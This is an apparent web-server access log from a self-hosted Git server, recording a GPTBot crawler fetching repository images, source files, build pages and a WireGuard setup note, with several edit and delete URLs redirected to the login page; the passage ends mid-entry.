-[17/Feb/2026:14:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508444] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641784] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699380] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15416] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10224] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322708] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692335] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498815] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429931] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211034] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15182] [Gzip 8.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 988] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10072] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 36753] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates%2ffavicon.ico" [Client 74.7.227.38] [Length 19195] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom3.png" [Client 74.7.227.38] [Length 22727] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom5.png" [Client 74.7.227.38] [Length 22738] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10223] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322709] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom1.png" [Client 74.7.227.38] [Length 22722] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom6.png" [Client 74.7.227.38] [Length 22724] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fControlRoom7.png" [Client 74.7.227.38] [Length 18732] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom2.png" [Client 74.7.227.38] [Length 22743] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom4.png" [Client 74.7.227.38] [Length 22739] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 32573] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 12828] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py" [Client 74.7.227.38] [Length 13167] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10171] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:47:45 +0000] - 200 200 - GET https 